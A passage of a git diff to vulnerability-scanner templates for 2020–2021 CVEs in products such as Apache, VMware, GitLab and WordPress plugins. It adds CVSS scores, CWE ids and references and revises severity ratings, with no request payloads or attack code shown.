cve,cve2020,apache reference: - http://packetstormsecurity.com/files/157924/Apache-Tomcat-CVE-2020-9484-Proof-Of-Concept.html + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.00 + cve-id: CVE-2020-9484 + cwe-id: CWE-502 requests: - method: GET diff --git a/cves/2020/CVE-2020-9490.yaml b/cves/2020/CVE-2020-9490.yaml index cd341cf256..583cee2db1 100644 --- a/cves/2020/CVE-2020-9490.yaml +++ b/cves/2020/CVE-2020-9490.yaml @@ -2,7 +2,7 @@ id: CVE-2020-9490 info: name: CVE-2020-9490 - severity: medium + severity: high description: Apache HTTP Server versions 2.4.20 to 2.4.43. A specially crafted value for the 'Cache-Digest' header in a HTTP/2 request would result in a crash when the server actually tries to HTTP/2 PUSH a resource afterwards. Configuring the HTTP/2 feature via "H2Push off" will mitigate this vulnerability for unpatched servers. author: philippedelteil tags: cve,cve2020,apache,dos @@ -11,6 +11,11 @@ info: - https://bugs.chromium.org/p/project-zero/issues/detail?id=2030 - https://bugs.chromium.org/p/project-zero/issues/attachmentText?aid=443369 - https://nvd.nist.gov/vuln/detail/CVE-2020-9490 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + cvss-score: 7.50 + cve-id: CVE-2020-9490 + cwe-id: CWE-444 requests: - method: GET diff --git a/cves/2020/CVE-2020-9496.yaml b/cves/2020/CVE-2020-9496.yaml index d8143b9e67..062a835761 100644 --- a/cves/2020/CVE-2020-9496.yaml +++ b/cves/2020/CVE-2020-9496.yaml @@ -10,6 +10,11 @@ info: - http://packetstormsecurity.com/files/158887/Apache-OFBiz-XML-RPC-Java-Deserialization.html - http://packetstormsecurity.com/files/161769/Apache-OFBiz-XML-RPC-Java-Deserialization.html - https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-9496 + cwe-id: CWE-79,CWE-502 requests: - raw: diff --git a/cves/2020/CVE-2020-9757.yaml b/cves/2020/CVE-2020-9757.yaml index c9ef094170..fac0befccd 100644 --- a/cves/2020/CVE-2020-9757.yaml +++ b/cves/2020/CVE-2020-9757.yaml @@ -6,6 +6,16 @@ info: severity: high description: The SEOmatic component before 3.3.0 for Craft CMS allows Server-Side Template Injection that leads to RCE via malformed data to the metacontainers controller. tags: cve,cve2020,ssti + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-9757 + cwe-id: CWE-74 + reference: + - https://github.com/nystudio107/craft-seomatic/blob/v3/CHANGELOG.md + - https://github.com/giany/CVE/blob/master/CVE-2020-9757.txt + - https://github.com/nystudio107/craft-seomatic/commit/65ab659cb6c914c7ad671af1e417c0da2431f79b + - https://github.com/nystudio107/craft-seomatic/commit/a1c2cad7e126132d2442ec8ec8e9ab43df02cc0f requests: - method: GET diff --git a/cves/2021/CVE-2021-1497.yaml b/cves/2021/CVE-2021-1497.yaml index 35aef60dbd..0074e7885d 100644 --- a/cves/2021/CVE-2021-1497.yaml +++ b/cves/2021/CVE-2021-1497.yaml @@ -15,6 +15,11 @@ info: - https://www.thezdi.com/blog/2021/6/23/cve-2021-1497-cisco-hyperflex-hx-auth-handling-remote-command-execution - https://github.com/EdgeSecurityTeam/Vulnerability/blob/c0af411de9adb82826303c5b05a0d766fb553f28/Cisco%20HyperFlex%20HX%20%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%EF%BC%88CVE-2021-1497-CVE-2021-1498%EF%BC%89.md tags: cve,cve2021,cisco,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-1497 + cwe-id: CWE-78 requests: - raw: diff --git a/cves/2021/CVE-2021-20090.yaml b/cves/2021/CVE-2021-20090.yaml index 9c9c57c372..f0e0214349 100644 --- a/cves/2021/CVE-2021-20090.yaml +++ b/cves/2021/CVE-2021-20090.yaml @@ -11,6 +11,11 @@ info: - https://www.tenable.com/security/research/tra-2021-13 - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2 tags: cve,cve2021,lfi,buffalo,firmware,iot + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-20090 + cwe-id: CWE-22 requests: - raw: diff --git a/cves/2021/CVE-2021-20091.yaml b/cves/2021/CVE-2021-20091.yaml index 6ac0d4f526..650be7cd88 100644 --- a/cves/2021/CVE-2021-20091.yaml +++ b/cves/2021/CVE-2021-20091.yaml @@ -3,7 +3,7 @@ id: CVE-2021-20091 info: name: Buffalo WSR-2533DHPL2 - Configuration File Injection author: gy741,pdteam,parth - severity: critical + severity: high description: | The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution. reference: @@ -11,6 +11,10 @@ info: - https://www.tenable.com/security/research/tra-2021-13 - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2 tags: cve,cve2021,buffalo,firmware,iot + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2021-20091 requests: - raw: diff --git a/cves/2021/CVE-2021-20092.yaml b/cves/2021/CVE-2021-20092.yaml index a419448255..72246e7705 100644 --- a/cves/2021/CVE-2021-20092.yaml +++ b/cves/2021/CVE-2021-20092.yaml @@ -3,7 +3,7 @@ id: CVE-2021-20092 info: name: Buffalo WSR-2533DHPL2 - Improper Access Control author: gy741,pdteam,parth - severity: critical + severity: high description: | The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly restrict access to sensitive information from an unauthorized actor. reference: @@ -11,6 +11,11 @@ info: - https://www.tenable.com/security/research/tra-2021-13 - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2 tags: cve,cve2021,buffalo,firmware,iot + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-20092 + cwe-id: CWE-200 requests: - raw: diff --git a/cves/2021/CVE-2021-20114.yaml b/cves/2021/CVE-2021-20114.yaml index 981a841397..1d17cd2a0e 100644 --- a/cves/2021/CVE-2021-20114.yaml +++ b/cves/2021/CVE-2021-20114.yaml @@ -10,6 +10,11 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-20114 tags: cve,cve2021,tcexam,disclosure + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-20114 + cwe-id: CWE-200 requests: - method: GET path: diff --git a/cves/2021/CVE-2021-21234.yaml b/cves/2021/CVE-2021-21234.yaml index cbfbd7cb86..182a3934d7 100644 --- a/cves/2021/CVE-2021-21234.yaml +++ b/cves/2021/CVE-2021-21234.yaml @@ -10,6 +10,11 @@ info: - https://github.com/cristianeph/vulnerability-actuator-log-viewer - https://nvd.nist.gov/vuln/detail/CVE-2021-21234 tags: cve,cve2021,springboot,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N + cvss-score: 7.70 + cve-id: CVE-2021-21234 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2021/CVE-2021-21307.yaml b/cves/2021/CVE-2021-21307.yaml index 83f46804d2..53b683b142 100644 --- a/cves/2021/CVE-2021-21307.yaml +++ b/cves/2021/CVE-2021-21307.yaml @@ -10,6 +10,11 @@ info: - https://github.com/httpvoid/writeups/blob/main/Apple-RCE.md - https://nvd.nist.gov/vuln/detail/CVE-2021-21307 tags: cve,cve2021,rce,lucee,adobe + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-21307 + cwe-id: CWE-862 requests: - raw: diff --git a/cves/2021/CVE-2021-21315.yaml b/cves/2021/CVE-2021-21315.yaml index 13d9c5e2c7..a2289106db 100644 --- a/cves/2021/CVE-2021-21315.yaml +++ b/cves/2021/CVE-2021-21315.yaml @@ -9,6 +9,11 @@ info: - https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC - https://security.netapp.com/advisory/ntap-20210312-0007/ tags: nodejs,cve,cve2021 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.80 + cve-id: CVE-2021-21315 + cwe-id: CWE-78 requests: - method: GET diff --git a/cves/2021/CVE-2021-21389.yaml b/cves/2021/CVE-2021-21389.yaml index adec07c32f..5d83282a56 100644 --- a/cves/2021/CVE-2021-21389.yaml +++ b/cves/2021/CVE-2021-21389.yaml @@ -3,7 +3,7 @@ id: CVE-2021-21389 info: name: BuddyPress REST API Privilege Escalation to RCE author: lotusdll - severity: critical + severity: high description: The BuddyPress WordPress plugin was affected by an REST API Privilege Escalation to RCE reference: - https://github.com/HoangKien1020/CVE-2021-21389 @@ -11,6 +11,11 @@ info: - https://codex.buddypress.org/releases/version-7-2-1/ - https://github.com/buddypress/BuddyPress/security/advisories/GHSA-m6j4-8r7p-wpp3 tags: cve,cve2021,wordpress,wp-plugin,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2021-21389 + cwe-id: CWE-863 requests: diff --git a/cves/2021/CVE-2021-21402.yaml b/cves/2021/CVE-2021-21402.yaml index 816303d5e5..c3c29e4665 100644 --- a/cves/2021/CVE-2021-21402.yaml +++ b/cves/2021/CVE-2021-21402.yaml @@ -3,13 +3,18 @@ id: CVE-2021-21402 info: name: Jellyfin prior to 10.7.0 Unauthenticated Arbitrary File Read author: dwisiswant0 - severity: high + severity: medium description: | Jellyfin allows unauthenticated arbitrary file read. This issue is more prevalent when Windows is used as the host OS. Servers that are exposed to the public Internet are potentially at risk. This is fixed in version 10.7.1. reference: https://securitylab.github.com/advisories/GHSL-2021-050-jellyfin/ tags: cve,cve2021,jellyfin,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.50 + cve-id: CVE-2021-21402 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2021/CVE-2021-21479.yaml b/cves/2021/CVE-2021-21479.yaml index 5d60f46f48..befe4c3526 100644 --- a/cves/2021/CVE-2021-21479.yaml +++ b/cves/2021/CVE-2021-21479.yaml @@ -9,6 +9,11 @@ info: In SCIMono before 0.0.19, it is possible for an attacker to inject and execute java expression compromising the availability and integrity of the system. tags: cve,cve2021,scimono,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H + cvss-score: 9.10 + cve-id: CVE-2021-21479 + cwe-id: CWE-74 requests: - method: GET diff --git a/cves/2021/CVE-2021-21801.yaml b/cves/2021/CVE-2021-21801.yaml index 338eccbd88..7168dc705a 100644 --- a/cves/2021/CVE-2021-21801.yaml +++ b/cves/2021/CVE-2021-21801.yaml @@ -7,6 +7,11 @@ info: description: This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to arbitrary JavaScript code execution. reference: https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272 tags: cve,cve2021,r-seenet,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-21801 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-21802.yaml b/cves/2021/CVE-2021-21802.yaml index a3eeb5f61e..a17edd857e 100644 --- a/cves/2021/CVE-2021-21802.yaml +++ b/cves/2021/CVE-2021-21802.yaml @@ -7,6 +7,11 @@ info: description: This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to arbitrary JavaScript code execution. reference: https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272 tags: cve,cve2021,r-seenet,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-21802 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-21803.yaml b/cves/2021/CVE-2021-21803.yaml index 93a8fcf35e..1068d20cde 100644 --- a/cves/2021/CVE-2021-21803.yaml +++ b/cves/2021/CVE-2021-21803.yaml @@ -7,6 +7,11 @@ info: description: This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to arbitrary JavaScript code execution. reference: https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272 tags: cve,cve2021,r-seenet,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-21803 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-21816.yaml b/cves/2021/CVE-2021-21816.yaml index e8df776430..de4ad69f3f 100644 --- a/cves/2021/CVE-2021-21816.yaml +++ b/cves/2021/CVE-2021-21816.yaml @@ -7,6 +7,11 @@ info: severity: medium reference: https://talosintelligence.com/vulnerability_reports/TALOS-2021-1281 tags: cve,cve2021,dlink,exposure,router + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N + cvss-score: 4.30 + cve-id: CVE-2021-21816 + cwe-id: CWE-922 requests: - method: GET diff --git a/cves/2021/CVE-2021-21972.yaml b/cves/2021/CVE-2021-21972.yaml index 4e9eb24eec..d69c8904d3 100644 --- a/cves/2021/CVE-2021-21972.yaml +++ b/cves/2021/CVE-2021-21972.yaml @@ -7,6 +7,11 @@ info: reference: https://swarm.ptsecurity.com/unauth-rce-vmware/ description: The vulnerability allows unauthenticated remote attackers to upload files leading to remote code execution (RCE). This templates only detects the plugin. tags: cve,cve2021,vmware,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-21972 + cwe-id: CWE-269 requests: - method: GET diff --git a/cves/2021/CVE-2021-21975.yaml b/cves/2021/CVE-2021-21975.yaml index e7337d9775..043597989c 100644 --- a/cves/2021/CVE-2021-21975.yaml +++ b/cves/2021/CVE-2021-21975.yaml @@ -3,10 +3,15 @@ id: CVE-2021-21975 info: name: vRealize Operations Manager API SSRF (VMWare Operations) author: luci - severity: critical + severity: high description: A malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials or trigger Remote Code Execution using CVE-2021-21983. tags: cve,cve2021,ssrf,vmware,vrealize reference: https://www.vmware.com/security/advisories/VMSA-2021-0004.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-21975 + cwe-id: CWE-918 requests: - raw: diff --git a/cves/2021/CVE-2021-21978.yaml b/cves/2021/CVE-2021-21978.yaml index 396c5b2fbc..5dc7d8641b 100644 --- a/cves/2021/CVE-2021-21978.yaml +++ b/cves/2021/CVE-2021-21978.yaml @@ -11,6 +11,11 @@ info: An unauthorized attacker with network access to View Planner Harness could upload and execute a specially crafted file leading to remote code execution within the logupload container. tags: cve,cve2021,vmware,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-21978 + cwe-id: CWE-434 requests: - raw: diff --git a/cves/2021/CVE-2021-21985.yaml b/cves/2021/CVE-2021-21985.yaml index ad807159dc..3c61e44f64 100644 --- a/cves/2021/CVE-2021-21985.yaml +++ b/cves/2021/CVE-2021-21985.yaml @@ -11,6 +11,11 @@ info: - https://www.vmware.com/security/advisories/VMSA-2021-0010.html - https://github.com/alt3kx/CVE-2021-21985_PoC tags: cve,cve2021,rce,vsphere + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-21985 + cwe-id: CWE-20 requests: - raw: diff --git a/cves/2021/CVE-2021-22122.yaml b/cves/2021/CVE-2021-22122.yaml index 53c6058203..83ca4f6d61 100644 --- a/cves/2021/CVE-2021-22122.yaml +++ b/cves/2021/CVE-2021-22122.yaml @@ -11,6 +11,11 @@ info: - https://www.fortiguard.com/psirt/FG-IR-20-122 - https://twitter.com/ptswarm/status/1357316793753362433 tags: cve,cve2021,fortiweb,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-22122 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-22145.yaml b/cves/2021/CVE-2021-22145.yaml index e018f535d1..3a38bddc00 100644 --- a/cves/2021/CVE-2021-22145.yaml +++ b/cves/2021/CVE-2021-22145.yaml @@ -10,6 +10,11 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-22145 - https://packetstormsecurity.com/files/163648/ElasticSearch-7.13.3-Memory-Disclosure.html tags: cve,cve2021,elascticsearch + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.50 + cve-id: CVE-2021-22145 + cwe-id: CWE-209 requests: - method: POST diff --git a/cves/2021/CVE-2021-22214.yaml b/cves/2021/CVE-2021-22214.yaml index b4e407b056..f1fcc89ba3 100644 --- a/cves/2021/CVE-2021-22214.yaml +++ b/cves/2021/CVE-2021-22214.yaml @@ -3,13 +3,18 @@ id: CVE-2021-22214 info: author: Suman_Kar name: Unauthenticated Gitlab SSRF - CI Lint API - severity: medium + severity: high description: When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab CE/EE affecting all versions starting from 10.5 was possible to exploit for an unauthenticated attacker even on a GitLab instance where registration is limited. reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-22214 - https://vin01.github.io/piptagole/gitlab/ssrf/security/2021/06/15/gitlab-ssrf.html - https://docs.gitlab.com/ee/api/lint.html tags: cve,cve2021,gitlab,ssrf,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.60 + cve-id: CVE-2021-22214 + cwe-id: CWE-918 requests: - raw: diff --git a/cves/2021/CVE-2021-22873.yaml b/cves/2021/CVE-2021-22873.yaml index ba23365c25..f0ccf1f6b7 100644 --- a/cves/2021/CVE-2021-22873.yaml +++ b/cves/2021/CVE-2021-22873.yaml @@ -3,10 +3,15 @@ id: CVE-2021-22873 info: name: Revive Adserver < 5.1.0 Open Redirect author: pudsec - severity: low + severity: medium description: Revive Adserver before 5.1.0 is vulnerable to open redirects via the dest, oadest, and ct0 parameters of the lg.php and ck.php delivery scripts. reference: https://nvd.nist.gov/vuln/detail/CVE-2021-22873 tags: cve,cve2021,redirect + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-22873 + cwe-id: CWE-601 requests: - method: GET diff --git a/cves/2021/CVE-2021-22986.yaml b/cves/2021/CVE-2021-22986.yaml index 508e2fda49..230b015a29 100644 --- a/cves/2021/CVE-2021-22986.yaml +++ b/cves/2021/CVE-2021-22986.yaml @@ -8,6 +8,10 @@ info: reference: - https://attackerkb.com/topics/J6pWeg5saG/k03009991-icontrol-rest-unauthenticated-remote-command-execution-vulnerability-cve-2021-22986 - https://support.f5.com/csp/article/K03009991 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-22986 requests: - raw: diff --git a/cves/2021/CVE-2021-23241.yaml b/cves/2021/CVE-2021-23241.yaml index 67b62f066e..da0426c806 100644 --- a/cves/2021/CVE-2021-23241.yaml +++ b/cves/2021/CVE-2021-23241.yaml @@ -9,6 +9,11 @@ info: - https://github.com/BATTZION/MY_REQUEST/blob/master/Mercury%20Router%20Web%20Server%20Directory%20Traversal.md - https://nvd.nist.gov/vuln/detail/CVE-2021-23241 tags: cve,cve2021,iot,lfi,router + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2021-23241 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2021/CVE-2021-24146.yaml b/cves/2021/CVE-2021-24146.yaml index c950e67161..61d3d453df 100644 --- a/cves/2021/CVE-2021-24146.yaml +++ b/cves/2021/CVE-2021-24146.yaml @@ -7,6 +7,11 @@ info: severity: high reference: https://wpscan.com/vulnerability/c7b1ebd6-3050-4725-9c87-0ea525f8fecc tags: wordpress,wp-plugin,cve,cve2021 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N + cvss-score: 7.50 + cve-id: CVE-2021-24146 + cwe-id: CWE-284 requests: - method: GET diff --git a/cves/2021/CVE-2021-24176.yaml b/cves/2021/CVE-2021-24176.yaml index 54bede3572..1d03f5739e 100644 --- a/cves/2021/CVE-2021-24176.yaml +++ b/cves/2021/CVE-2021-24176.yaml @@ -9,6 +9,11 @@ info: - https://wpscan.com/vulnerability/705bcd6e-6817-4f89-be37-901a767b0585 - https://wordpress.org/plugins/jh-404-logger/ tags: cve,cve2021,wordpress,wp-plugin,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.40 + cve-id: CVE-2021-24176 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-24210.yaml b/cves/2021/CVE-2021-24210.yaml index faca3d5383..50b0897459 100644 --- a/cves/2021/CVE-2021-24210.yaml +++ b/cves/2021/CVE-2021-24210.yaml @@ -9,8 +9,13 @@ info: ago (https://wordpress.org/support/topic/phast-php-used-for-remote-fetch/) that says that the php involved in the request only go to whitelisted pages but it's possible to redirect the victim to any domain. reference: https://wpscan.com/vulnerability/9b3c5412-8699-49e8-b60c-20d2085857fb - severity: low + severity: medium tags: wordpress,cve,cve2021,redirect + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24210 + cwe-id: CWE-601 requests: - method: GET diff --git a/cves/2021/CVE-2021-24235.yaml b/cves/2021/CVE-2021-24235.yaml index 6da6293c88..1178e0035a 100644 --- a/cves/2021/CVE-2021-24235.yaml +++ b/cves/2021/CVE-2021-24235.yaml @@ -6,6 +6,12 @@ info: severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24235 tags: cve,cve2021,wordpress,xss,wp-theme + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24235 + cwe-id: CWE-79 + description: "The Goto WordPress theme before 2.0 does not sanitise the keywords and start_date GET parameter on its Tour List page, leading to an unauthenticated reflected Cross-Site Scripting issue." requests: - method: GET diff --git a/cves/2021/CVE-2021-24237.yaml b/cves/2021/CVE-2021-24237.yaml index 365eb7c2d9..c9842dc7c4 100644 --- a/cves/2021/CVE-2021-24237.yaml +++ b/cves/2021/CVE-2021-24237.yaml @@ -9,6 +9,11 @@ info: reference: - https://wpscan.com/vulnerability/087b27c4-289e-410f-af74-828a608a4e1e - https://m0ze.ru/vulnerability/[2021-03-20]-[WordPress]-[CWE-79]-Realteo-WordPress-Plugin-v1.2.3.txt + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24237 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-24285.yaml b/cves/2021/CVE-2021-24285.yaml index 7fb471bc6f..d620d2d396 100644 --- a/cves/2021/CVE-2021-24285.yaml +++ b/cves/2021/CVE-2021-24285.yaml @@ -10,6 +10,11 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-24285 - https://codevigilant.com/disclosure/2021/wp-plugin-cars-seller-auto-classifieds-script-sql-injection/ - https://wpscan.com/vulnerability/f35d6ab7-dd52-48b3-a79c-3f89edf24162 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-24285 + cwe-id: CWE-89 requests: - raw: diff --git a/cves/2021/CVE-2021-24288.yaml b/cves/2021/CVE-2021-24288.yaml index d5b21f2ecd..5b0b13cded 100644 --- a/cves/2021/CVE-2021-24288.yaml +++ b/cves/2021/CVE-2021-24288.yaml @@ -7,6 +7,11 @@ info: description: When using acymailing to subscribe to a newsletter, you make a POST request with various parameters. Turning that to a GET request and adding the parameters as GET parameters, you can successfully go through with the subscription. reference: https://wpscan.com/vulnerability/56628862-1687-4862-9ed4-145d8dfbca97 tags: wordpress,cve,cve2021,redirect,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24288 + cwe-id: CWE-601 requests: - method: GET diff --git a/cves/2021/CVE-2021-24291.yaml b/cves/2021/CVE-2021-24291.yaml index 3d7e73cfbc..736f309f8a 100644 --- a/cves/2021/CVE-2021-24291.yaml +++ b/cves/2021/CVE-2021-24291.yaml @@ -7,6 +7,11 @@ info: reference: https://wpscan.com/vulnerability/cfb982b2-8b6d-4345-b3ab-3d2b130b873a severity: medium tags: cve,cve2021,xss,wordpress,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24291 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-24298.yaml b/cves/2021/CVE-2021-24298.yaml index 40b4fa673f..21462431a1 100644 --- a/cves/2021/CVE-2021-24298.yaml +++ b/cves/2021/CVE-2021-24298.yaml @@ -7,6 +7,11 @@ info: description: The method and share GET parameters of the Giveaway pages were not sanitised, validated or escaped before being output back in the pages, thus leading to reflected XSS reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24298 tags: cve,cve2021,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24298 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-24316.yaml b/cves/2021/CVE-2021-24316.yaml index f4b9b78af4..9d76374f71 100644 --- a/cves/2021/CVE-2021-24316.yaml +++ b/cves/2021/CVE-2021-24316.yaml @@ -9,6 +9,11 @@ info: reference: - https://wpscan.com/vulnerability/57e27de4-58f5-46aa-9b59-809705733b2e - https://m0ze.ru/vulnerability/%5B2021-03-14%5D-%5BWordPress%5D-%5BCWE-79%5D-Mediumish-WordPress-Theme-v1.0.47.txt + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24316 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-24320.yaml b/cves/2021/CVE-2021-24320.yaml index 408f23de62..458e6b28e6 100644 --- a/cves/2021/CVE-2021-24320.yaml +++ b/cves/2021/CVE-2021-24320.yaml @@ -9,6 +9,11 @@ info: - https://m0ze.ru/vulnerability/%5B2021-03-21%5D-%5BWordPress%5D-%5BCWE-79%5D-Bello-WordPress-Theme-v1.5.9.txt - https://wpscan.com/vulnerability/6b5b42fd-028a-4405-b027-3266058029bb tags: cve,cve2021,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24320 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-24335.yaml b/cves/2021/CVE-2021-24335.yaml index 960dfbe32b..89d2be4bec 100644 --- a/cves/2021/CVE-2021-24335.yaml +++ b/cves/2021/CVE-2021-24335.yaml @@ -7,6 +7,11 @@ info: description: The Car Repair Services & Auto Mechanic WordPress theme before 4.0 did not properly sanitise its serviceestimatekey search parameter before outputting it back in the page, leading to a reflected Cross-Site Scripting issue reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24335 tags: cve,cve2021,wordpress,xss,wp-plugin + classification: + cvss-metrics: 